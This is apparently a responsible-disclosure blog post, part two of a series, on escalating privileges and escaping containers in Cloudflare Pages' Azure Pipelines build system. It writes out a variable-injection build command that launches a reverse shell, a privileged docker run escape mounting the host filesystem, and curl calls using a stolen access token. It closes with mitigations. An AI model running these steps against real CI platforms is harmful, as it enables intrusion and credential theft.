Cloudflare Pages, part 2: The two privescs

May 6, 2022

Bart Simpson sliding down a staircase, before falling off the railing and hitting each stair on the way down. Bart is labelled with the words 'cloudflare pages' and the steps are labelled with various security issues.
 

Introduction

Following on from our first post, we’ll be continuing the epic tale of our research into Cloudflare Pages in this second installment. If you haven’t read part 1, you can read it here.

We pick up where we left off, after harvesting a bunch of secrets from the Cloudflare Pages build system and getting our reverse shell running as the AzDevOps+ user, which gave us root in the container.

OrangeRa1n Jailbreak

As we reported the previous vulnerabilities to Cloudflare, they systematically applied fixes to the code orchestrating the builds, which locked us back out, so we had to find a new way back in each time. While we still had access, though, we wanted to try and find further injection bugs. Having exhausted the low-hanging fruit for escaping the buildbot user, we now wanted to get a root shell on the Cloudflare Pages CI hosts. You may remember us talking a big game about containers, privilege escalation, and container escape earlier in this series. In any CI/CD system you are looking at, these can often lead to some really good findings if you can achieve them, because the container is often improperly treated as a security boundary by application developers. That turned out to be the case for Cloudflare Pages.

In the previous post in this series, we talked about the buildbot user and the AzDevOps+ user, and the fact that our build scripts were running in the context of the buildbot user as part of the build process, potentially inside a container. The previous two findings were both performed in the context of this buildbot user, and eventually AzDevOps+, which gave us root in the container. We wanted to try a little harder and see if we could escape the container and execute code as root on the host. First, though, let’s look for some other ways we can get back into the AzDevOps+ user should we get locked out, given we currently have access and the build tooling source code.

Referring again to the screenshot from the first set of findings, of the process tree -

a screenshot of a process tree from within a reverse shell, showing our process is running as the AzDevOps+ user we mentioned previously

You can see here that we have processes in the tree running as root and as AzDevOps+. Interestingly, this process tree tells us quite a lot about the execution environment -

  • The node process running as root has a PID of 1. Normally, PID 1 is the init system under Linux (either SysV init or systemd), so the fact that PID 1 is showing as node is a strong indicator that we are in fact running inside a container, and that this node process is our container entrypoint.
  • The build script is running as buildbot, but further up the process tree we can see the sudo to the buildbot user, running as root. Given the parent process of sudo is running as AzureDevOps, this tells us that the AzureDevOps user has root access via sudo.
  • The fact that the sudo is happening as part of a bash script strongly suggests that AzureDevOps has passwordless sudo. Entering a password into sudo programmatically from a script requires good secrets management and significant extra engineering effort. Mostly, folks do not bother with this and just grant passwordless sudo to the user running the automation (or build script, in our case).
  • We can see that there is a mixture of node processes and bash scripts running from the __w directory, but also from /opt/pages. The /opt/pages folder strongly suggests this part of the process tree is part of the Pages build, and that we can potentially influence it with our build.
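
The first and third observations can be checked directly from a shell. The following is a minimal sketch, assuming a Linux environment with /proc mounted; the helper names (is_host_init, describe_pid1) are hypothetical, and the PID 1 test is only a heuristic, not proof either way.

```shell
# Heuristic: a well-known init system as PID 1 suggests a full host or VM;
# anything else (node, bash, python, ...) hints at a container entrypoint.
is_host_init() {
  case "$1" in
    systemd|init) return 0 ;;
    *) return 1 ;;
  esac
}

# Turn the name of PID 1 into a human-readable verdict.
describe_pid1() {
  if is_host_init "$1"; then
    echo "PID 1 is '$1': looks like a regular init system"
  else
    echo "PID 1 is '$1': probably a container entrypoint"
  fi
}

# On Linux, /proc/1/comm holds the command name of PID 1.
if [ -r /proc/1/comm ]; then
  describe_pid1 "$(cat /proc/1/comm)"
fi

# sudo -n never prompts: it exits non-zero if a password would be required.
if command -v sudo >/dev/null 2>&1 && sudo -n true 2>/dev/null; then
  echo "passwordless sudo is available to $(id -un)"
fi
```

In an environment like the one described above, we would expect the first check to report node and the second to succeed for the user running the Pipelines agent.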

Given the above factors, compromising the integrity of any of the scripts in the process tree prior to the sudo has a high chance of giving us passwordless root inside a container, and having root in a container gives us a strong chance of escaping it. With that in mind, we dug into the scripts in question.

We focused first on the Pages build script, /opt/pages/build_tool/build.sh. Sadly, this looked fairly simple and didn’t present a lot of opportunity for command injection. We moved further up the process tree.

Looking at the .js scripts in the __w directory, it became apparent pretty quickly that these were part of the Microsoft Azure DevOps Pipelines agent. We’d like to quickly take a moment to thank Microsoft for their transparency and recent commitment to Open Source - because the entire build agent was available to us on GitHub.

Reading the documentation for Pipelines, you are very quickly introduced to the format and purpose of the .azure-pipelines.yml file. The Azure DevOps Pipelines agent operates on this YAML configuration file, which we briefly mentioned earlier in this series. Essentially, it is a workflow file that details the steps the agent will execute inside an Azure VM when the pipeline is run in Azure DevOps. Thanks to the extensive documentation, we didn’t actually have to dig too deep into the agent code to work out how this all works.

Reading over the documentation, looking for ways we might be able to run our own code under the Pipelines agent, Sean noticed this documentation section on Azure DevOps Pipelines variables, specifically that they can be interpolated inside the YAML. Normally, you would assume that if Cloudflare Pages was generating an Azure DevOps Pipelines file to run our builds, they would be sanitising variables for the interpolation patterns detailed in the document.

Testing assumptions like this is a key part of finding good bugs, so we tried to insert some interpolated Azure DevOps Pipelines variables into our build settings, to see if we could use them to interpolate strings we controlled into build steps we should not be able to control. Keeping in mind that the commands in the Pipelines configuration would be running as the AzureDevOps user, which we strongly suspected had passwordless sudo, we went looking for a useful variable to set.

We found the below command which uses the account_env variable to generate the command used to run the build script. If we can control account_env, we can likely run an arbitrary command before the sudo happens, as $() substitutions happen prior to execution of a command in bash, in a subshell, which runs in the context of the user running the command. In our case, the contents of account_env would be evaluated (and executed!) as the AzureDevops user prior to the sudo to buildbot, which is exactly the outcome we want.

a screenshot of the post-status-update part of the build tooling pipeline used by azure devops, where $(account_env) is present in the commandline
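
To make the injection point concrete, here is a small sketch of what happens to a script line once a controlled value lands in it. Azure Pipelines documents $(name) as macro syntax that the agent replaces with the variable's value in the script text before the step runs; the sketch assumes that behaviour applies here. The expand_macro helper and the template line are hypothetical stand-ins (the real command is only visible in the screenshot), and nothing is executed, only printed.

```shell
# Hypothetical stand-in for the agent's macro expansion: substitute the first
# literal "$(name)" in a script template with a value, as plain text.
expand_macro() {
  awk -v tmpl="$1" -v name="$2" -v val="$3" 'BEGIN {
    marker = "$(" name ")"
    i = index(tmpl, marker)
    if (i == 0) { print tmpl; exit }
    print substr(tmpl, 1, i - 1) val substr(tmpl, i + length(marker))
  }'
}

# Assumed template line, for illustration only.
template='sudo -u buildbot $(account_env) /opt/pages/build_tool/build.sh'

# A value that closes the current command, runs ours, and swallows the rest.
payload=';bash /tmp/shell.sh;echo '

# Print the line bash would end up seeing; do not run it.
expand_macro "$template" account_env "$payload"
```

With these assumed inputs the printed line contains three separate commands, and the middle one (bash /tmp/shell.sh) would run as whichever user is executing the script, before any switch to buildbot takes effect.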

With this target input in mind, we added the following to the “build command” in our Cloudflare Pages project -

echo ok shell please
echo '##vso[task.setvariable variable=account_env];bash /tmp/shell.sh;echo '

This would (hopefully) tell Azure DevOps Pipelines to set the account_env variable in the Pipelines configuration to the string ‘;bash /tmp/shell.sh;echo ’. /tmp/shell.sh is, unsurprisingly, a reverse shell, and is part of our Git repository. If the variable injection works and we can inject this command, the reverse shell should be checked out in time for the evaluation of $(account_env) to happen, which would trigger our reverse shell as the AzureDevOps user.
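
The logging command printed by our build has a simple shape: a ##vso[task.setvariable variable=NAME] prefix, followed by the value. The sketch below pulls such a line apart to show what name and value an agent would see. The parse_setvariable function is a hypothetical illustration, not the agent's real parser, and it ignores any additional properties a real command may carry.

```shell
# Split a "##vso[task.setvariable variable=NAME]VALUE" line into its parts.
# Returns non-zero for lines that are not a setvariable logging command.
parse_setvariable() {
  prefix='##vso[task.setvariable variable='
  case "$1" in
    "$prefix"*"]"*) ;;
    *) return 1 ;;
  esac
  rest=${1#"$prefix"}      # drop the fixed prefix
  name=${rest%%"]"*}       # everything up to the first ]
  value=${rest#*"]"}       # everything after the first ]
  printf 'name=[%s]\nvalue=[%s]\n' "$name" "$value"
}

# The line our build command echoes; brackets make the trailing space visible.
parse_setvariable '##vso[task.setvariable variable=account_env];bash /tmp/shell.sh;echo '
```

Everything after the closing bracket, including the leading semicolon and the trailing space, becomes the value of account_env.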

Running the job, we receive - a screenshot of a reverse shell session, with the whoami command showing the user as AzDevOps_azpcontainer

…a shell, as AzDevOps_azpcontainer - the full, non-truncated username running the Pipelines agent. The username also strongly suggests that we are in a container, as does the UUID hostname, which is commonly seen with Docker containers. We’ve now got a second way back to this user, and another report to file.

Now that we’ve got a few ways in, it’s time to really break out the privilege escalation and go for a full container escape. Firstly, in our new context, we poked around the filesystem. One of the easiest ways to break out of a container (and a bit of a cardinal sin) is if the Docker socket is bind-mounted into it, or accessible via TCP without TLS from inside it. As luck would have it, there was indeed a /var/run/docker.sock present in the environment, owned by root. Our theory was that the root user we could reach via sudo inside the container would still be able to access the socket, even if user namespace remapping was in place (remapping is an opt-in Docker feature which maps the UID of root in the container to an unprivileged user ID in the host kernel). Naturally, we attempted to check what was at the other end of the docker socket.
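
One lightweight way to do that check, before installing anything, is to test the socket and ask the daemon to identify itself over the Docker Engine API. This is a sketch rather than what we ran at the time; socket_status is a hypothetical helper, and it assumes curl is available and new enough to support --unix-socket.

```shell
# Report whether a path is a Unix socket the current user can read and write.
socket_status() {
  if [ ! -S "$1" ]; then
    echo "no socket at $1"
  elif [ -r "$1" ] && [ -w "$1" ]; then
    echo "socket at $1 is usable"
  else
    echo "socket at $1 exists but is not usable by this user"
  fi
}

sock=/var/run/docker.sock
socket_status "$sock"

# If the socket is usable, ask whatever is listening to describe itself.
# /version is a read-only Docker Engine API endpoint.
if [ -S "$sock" ] && [ -w "$sock" ] && command -v curl >/dev/null 2>&1; then
  curl --silent --max-time 5 --unix-socket "$sock" http://localhost/version || true
fi
```

Run as root inside the container, a JSON response from /version would confirm that a Docker daemon is listening on the other end.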

a screenshot of the reverse shell after running sudo to gain root access in the container, and installing the docker package

So, we installed docker inside our container. Executing mount showed the presence of overlayfs and a series of bind mounts for files like /etc/resolv.conf, confirming we are indeed inside of a docker container, so an escape would be worthwhile if we could pull it off.

Let’s break out!

At this point, we had docker installed, and root access inside the container. The container escape with this access is actually really easy. We knew at this point we were trapped inside -

  • A process namespace, which would be limiting the processes and environment variables we could see
  • A network namespace, limiting what kind of networks we had access to
  • A user namespace, meaning our root account wasn’t the “real” root user on the host
  • And other, less problematic namespaces and cgroups

We simply ran the below command, to create a “super privileged container” -

sudo docker run -ti --privileged --net=host -v /:/host -v /dev:/dev -v /run:/run ubuntu:latest

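Let’s dig into those arguments a little, along with the related host namespace flags (--uts=host, --ipc=host and --pid=host) that can be added in the same way -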

  • -ti attaches a PTY and runs the command interactively, giving us an interactive shell
  • --net=host disables network namespace creation. This means our network namespace is the “root” or host network namespace, so we are not confined in this regard. We can access all network interfaces, firewall rules (iptables) and network sockets on the host.
  • --uts=host disables UTS namespace creation. This means our hostname information will be the same as the actual host. Not essential, but cool to demonstrate impact.
  • --ipc=host disables IPC namespace creation. We have full access to host IPC.
  • --pid=host disables process namespace creation. This means our PID namespace is the “root” or host namespace, so we can see all processes.
  • -v /:/host mounts the host server’s filesystem at /host inside our container. Whilst this doesn’t disable the mount namespace (we still have our own filesystem for the container), it does allow access to all files on the host.
  • --privileged is going to be very useful for us in proving impact on this issue, as it grants the container every capability, gives it access to the host’s devices and disables the default seccomp and AppArmor confinement. With no user namespace remapping in effect, our root account is the “real” root account, and we also get full access to the host’s /proc filesystem

Boom.

a screenshot showing the above docker command being run and the result being a root shell on the host machine with access to the host filesystem, showing the hostname of the host system
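
For reference, the flags discussed above can be assembled into one invocation. The sketch below only prints the resulting command rather than running it; build_escape_command is a hypothetical helper, the bind mount uses the /host path from the command we ran, and the namespace flags are included purely to show how they combine.

```shell
# Assemble (and print, not run) a docker invocation that switches off
# each layer of isolation in turn.
build_escape_command() {
  set -- docker run -ti        # interactive shell with a PTY
  set -- "$@" --privileged     # all capabilities and host devices
  set -- "$@" --net=host       # share the host network namespace
  set -- "$@" --uts=host       # share the host's hostname information
  set -- "$@" --ipc=host       # share host IPC
  set -- "$@" --pid=host       # see every process on the host
  set -- "$@" -v /:/host       # host filesystem visible under /host
  set -- "$@" ubuntu:latest    # any image with a shell will do
  echo "$*"
}

build_escape_command
```

Each flag removes one of the confinements listed earlier, which is why access to the Docker socket as root is usually treated as equivalent to root on the host.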

Googling, we realised that the SECRET_SYSTEM_ACCESSTOKEN values available to us were in fact tokens which the instance used for authenticating with Azure DevOps itself. Interesting! They are similar to the instance tokens on AWS that are obtainable via the cloud instance metadata APIs. Using these, we could say a friendly Windows Hello to Cloudflare’s Azure DevOps Organisation.

curl "https://[email protected]/cloudflarepages/_apis/teams?api-version=6.0-preview.3" -H "Authorization: Bearer $SECRET_SYSTEM_ACCESSTOKEN" | jq
curl "https://[email protected]/cloudflarepages/_apis/projects/<uuid>/teams/<uuid>/members?api-version=6.0" -H "Authorization: Bearer $SECRET_SYSTEM_ACCESSTOKEN" | jq

With this, we were able to list all of Cloudflare’s users within this project:

a screenshot of the API call response for listing the users in the Cloudflare org we had access to, via the API, showing a list of Cloudflare employees who have access to Cloudflare's org used for pages

We were also able to access the Cloudflare Pages build history for all users on Cloudflare Pages -

curl "https://[email protected]/cloudflarepages/Pages/_apis/pipelines/2/runs?api-version=6.0-preview.1" -H "Authorization: Bearer $SECRET_SYSTEM_ACCESSTOKEN" | jq

a screenshot showing the build history in DevOps pipelines for the cloudflare pages project, including our builds

Conclusion

We had achieved our goal of stealing GitHub and Cloudflare tokens from the platform, but we had also managed to escalate privileges to root in the container, escape the confinement of the container to get a root shell on the host, and ultimately gain access to the Azure DevOps Organisation for Cloudflare.

In remediating this issue, there are multiple points of defense in depth that could be utilized to prevent this from occurring:

  • The initial vector was caused by a subtle feature of Azure DevOps Pipelines. Only the security section of their documentation recommends adding a restriction on logging commands to prevent this kind of exposure (https://docs.microsoft.com/en-us/azure/devops/pipelines/security/templates?view=azure-devops#agent-logging-command-restrictions). We point to Felix Wilhelm’s work at Google Project Zero, which similarly addressed these concerns: https://bugs.chromium.org/p/project-zero/issues/detail?id=2070&can=2&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&cells=ids
  • Providing passwordless sudo to the Azure DevOps user resulted in us being able to escalate privileges to root within the container. Requiring a password, or heavily restricting passwordless sudo to only the specific binaries that need it, may have partially mitigated this risk.
  • Mounting the docker.sock socket into the container allowed us to escape out of the container. Not mounting this file at all, or restricting read and write permissions on the socket file, may have mitigated this risk if we weren’t able to escalate to root.
  • Limiting possible syscalls using technologies like seccomp, SELinux or AppArmor, or emulating syscalls using technology such as gVisor, would prevent the use of inappropriate syscalls which indicate compromise. In our case, our builds had no business calling syscalls such as mount, chroot or clone - but here we were, spawning containers and mounting filesystems.
  • Directly executing commands containing interpolated variables as a high-privilege user resulted in this vulnerability, so sanitizing the environment variables and dropping privileges before executing the operation would also have reduced this risk.
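
As an illustration of the sanitizing idea in the first and last points, untrusted build output could be passed through a filter that defangs logging commands before the agent sees them. This is a rough sketch only: defang_logging_commands is a hypothetical helper, it does not try to cover every spelling the agent might accept, and the documented restriction on logging commands is likely the more robust control.

```shell
# Rewrite the "##vso[" marker anywhere in the input so the line no longer
# has the shape of a logging command.
defang_logging_commands() {
  sed 's/##vso\[/##vso-blocked[/g'
}

# Example: the output produced by the build command from our project.
printf '%s\n' \
  'ok shell please' \
  '##vso[task.setvariable variable=account_env];bash /tmp/shell.sh;echo ' \
  | defang_logging_commands
```

Ordinary output passes through untouched, while the setvariable line is altered so it is no longer an instruction to the agent.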

At this point, we submitted all our bugs to Cloudflare, and they very quickly triaged them and began attempting to remediate the issues. We initially asked to disclose; however, their very reasonable response was to request that we stop testing until they had mitigated the vulnerabilities.

Part 3

After assessing their options, Cloudflare decided to pursue different architectures for Cloudflare Pages not based on Azure Pipelines. They also requested that we not disclose until they had finished their rearchitecture. It’s not every day you get to say you hacked a platform to the point where it had to be totally rearchitected - but here we are. You might think that would have been enough, but join us in The return of the secrets: part 3 for the final part of our research, where we look at the re-architected platform. Or, head back to part 1.